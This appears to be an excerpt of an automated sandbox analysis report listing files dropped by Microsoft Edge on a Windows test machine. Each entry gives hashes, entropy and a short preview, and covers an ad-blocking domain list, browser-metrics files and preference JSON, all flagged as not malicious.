                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                  Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                  MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                  SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                  SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                  SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                  Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                  MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                  SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                  SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                  SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67641526-1C90.pma

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.445029226051571
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:Jd20R1+eGFqBmEWjS9/k0/6g1HFq2bj3hShBFq0HWhfMS0UsPg1HFF:S0ROioS9s0/6aHlbdStXWhfx0naHP
                                                                                                                                                                                                                                                                  MD5:C8E2DFC0D1A3C290AEE3CEA9F7303D75
                                                                                                                                                                                                                                                                  SHA1:4CE26061BA070F8B82A7CA8AF14427ABE742F8E3
                                                                                                                                                                                                                                                                  SHA-256:4BF85F33E194365200904684957C5C91589535C1EAA4C91551ECA1240341DC73
                                                                                                                                                                                                                                                                  SHA-512:AF3EAFD7BA38250CEC2C23C4A19737A05B04360DC52EABDCE1C68D6FFBB3926A1A6379791DFFE6797FE8ADC454977AA9F169CE094D188929F16D82291D87E53F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@...................X...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".gwemsf20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K.u.$r.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.........5..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67641534-500.pma

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                  Entropy (8bit):0.045508133579448246
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:+eyf0pqtmCnOAXYzJxwasggLXC2IcVkDQMahwVNISsP1gQ4ZpJa1n8y08Tcm2RGY:+Lf0ctlCKdN9hUStg9JU08T2RGOD
                                                                                                                                                                                                                                                                  MD5:BFA30347B248CBDE89B00D13D747847D
                                                                                                                                                                                                                                                                  SHA1:1694E2A057A4314EBB4228865AFA296106A3A051
                                                                                                                                                                                                                                                                  SHA-256:430976646058B6DEF2E1D0F89759D0C7CE10B31DA1A679B8B1994CD3CC617890
                                                                                                                                                                                                                                                                  SHA-512:30798B1891534A801E6E30E21E351BA43F5165DEE262CE6FD9A2E886E29FB4CB23FFB39BDF1406C51994C94A9B2A2C490E0F10B521AC321FF7AB2323CDB67795
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................f...V..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".gwemsf20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..Uu.$r.>.........."....."...24.."."kO06amHkwj6ay4zsiHVrq1qvLKquqL8gjiXFuWicZwY="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                  Entropy (8bit):4.195531555605595
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlcUEV9QCfJoGJgBVP/Sh/JzvbYuDRBOc7cEJH1l:o1cU89BJrJgBVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                  MD5:41B03A01D8F8B79D45FCB0734FEF508A
                                                                                                                                                                                                                                                                  SHA1:12646F9B24CDAB425454DEDF6DEAD4C1ADDD939A
                                                                                                                                                                                                                                                                  SHA-256:2FC4D45060CF6251D9E9ADA2F3421E6220B092795A1FBC4A39A2054FAC349827
                                                                                                                                                                                                                                                                  SHA-512:C871F7DE6C2C513A3811DCAA804F1B3B00C7F837B8A3D1E6F996BC118F1EEA2CEE9666B8BB2E16065163ACF0E875AE84B37500FC805F2D8FEEF514AD42D5DFFB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:sdPC.....................cT..\.E.....P."kO06amHkwj6ay4zsiHVrq1qvLKquqL8gjiXFuWicZwY="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0151081b-b2c6-4d0b-995b-3007b9090bb4.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0c59ea88-9ea6-49e1-93ed-d45945e7f07d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13335
                                                                                                                                                                                                                                                                  Entropy (8bit):5.261368760383692
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stvJ99QTryDiooMbatSuyEs3AkaFvrExMAUkiOb3n82bV+FiAlOw3iPsYJ:stvPGoSSuBs3AkCDgQQbGi0Ow3O
                                                                                                                                                                                                                                                                  MD5:687A7E06E7845E4A84BDC5A173D3B45D
                                                                                                                                                                                                                                                                  SHA1:01B0DCB0C97779218FF7EE49BEEA1C8977650574
                                                                                                                                                                                                                                                                  SHA-256:98BCB084C5CEF84056A1B6AF9CD9AAD05382F969FEEC2192E60BF5E701F39F23
                                                                                                                                                                                                                                                                  SHA-512:220A845E92C0E1E1834E2D107A56F36328F9A6586ED8C20439A7DC77193E40F7CD15864FB2AD6D7D214EBC639D1FF0D19C29D227EF9F281103F97107C9E9F9D7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\17d0ae4b-89a7-44cb-943a-aeb96ecaf73f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):12577
                                                                                                                                                                                                                                                                  Entropy (8bit):5.184488888267532
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stvJ99QTryDiooMbatSuyEs3AkaFvrE9kiOb3n82bV+FiAfObUiPsYJ:stvPGoSSuBs3AkCDQQbGiqOgO
                                                                                                                                                                                                                                                                  MD5:CA75F5F121FF159CC66BD59124DD02E8
                                                                                                                                                                                                                                                                  SHA1:BCCF6220E646D8140D5E5EAAB248723AEEF95BED
                                                                                                                                                                                                                                                                  SHA-256:99BB6C6A7E6B381B5A15CF3ED61CD2E317D1D47F95E604C388C43F3F6B51F1FC
                                                                                                                                                                                                                                                                  SHA-512:5C1912267CD2B0D9C1623AC19C849E09D17F45D589EF8D486B4DBA717AA192F5562E939B96B3A9B58DD7D1999948173F948C4375F26F9DA14931AAF50B8E4C55
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8e2b0e25-e68b-48b6-9fb0-7db661bd3b52.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9033fd50-488a-4034-884c-8aea6431bdfc.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                  Entropy (8bit):5.561242024956717
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDSb8VW9k7pLGLhNnW5wwyf41/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPKIpiIfMR:fewVuochNnWawyf2/u1ja3IpnnEdZyzU
                                                                                                                                                                                                                                                                  MD5:8D28D2F29C793FF6B69309B8FDB4076B
                                                                                                                                                                                                                                                                  SHA1:C7D3E652D835141FEA3E2F84DB7C9C6AE35671EA
                                                                                                                                                                                                                                                                  SHA-256:8D02772FAA08C5A732B9224D1B8D9A7FDEA6D970BC49C2957E300EEF6EB0FB52
                                                                                                                                                                                                                                                                  SHA-512:BC12F458E58C0BCAFDA8E9E87F361EB2A8024F73F1F7CF73E098D3B5B6EDBA32D0C47EF2BE0379C5BAE609B1C05AC7F180D0B58AEFC99BE08B1372B5F2CD594B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\923ee95c-f97a-43e6-a25b-a79b2f1d36f3.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                  Entropy (8bit):5.567558347504769
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDrbiVWLnW5wwyf44/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPWiIfM9XrwXopBtuJ:f32VanWawyfR/u1jaznYE+ty
                                                                                                                                                                                                                                                                  MD5:5E52B79374A0866B50456D205B21AE86
                                                                                                                                                                                                                                                                  SHA1:EB0497DEE1901F47A3A7BC049EE4A6C0243CDA79
                                                                                                                                                                                                                                                                  SHA-256:BC359FA6DEB52AA083F857B7B8E658FF8074147FEC6BFD599FDB5159CB97D4F8
                                                                                                                                                                                                                                                                  SHA-512:089A8C27CFE43E9A63B2B7998BF9B9408476198218CADDF5D3BC4F31FC84530DB7F511ADA96B91004C21DF7B15ACB6A917B6B659EBAD4F9AE7972E251F4B9EB5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9f3cf236-b9e4-4862-9b6d-b0f64c7dfaee.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13335
                                                                                                                                                                                                                                                                  Entropy (8bit):5.261319678859274
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stvJ99QTryDiooMbatSuyEs3AkaFvrExMAUkiOb3n82bV+FiAfOw3iPsYJ:stvPGoSSuBs3AkCDgQQbGieOw3O
                                                                                                                                                                                                                                                                  MD5:FC445882D7E7BBA91F73763ECCAFD326
                                                                                                                                                                                                                                                                  SHA1:6465F74C9200A18C20A30BA4B17F0B14D4B69528
                                                                                                                                                                                                                                                                  SHA-256:615B6E05502CE862013E09432B1553DFCA04E6F0DDCCDE19587389F4B3162B9F
                                                                                                                                                                                                                                                                  SHA-512:05D2892250A05F1020F76E406D99B82079AC178741414BDF8BFFB2F95A78E5E74EC8AFA5BFE8A351F088ED432FF1A5C718F79A21926A57EB43897B92AF2BFD95
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
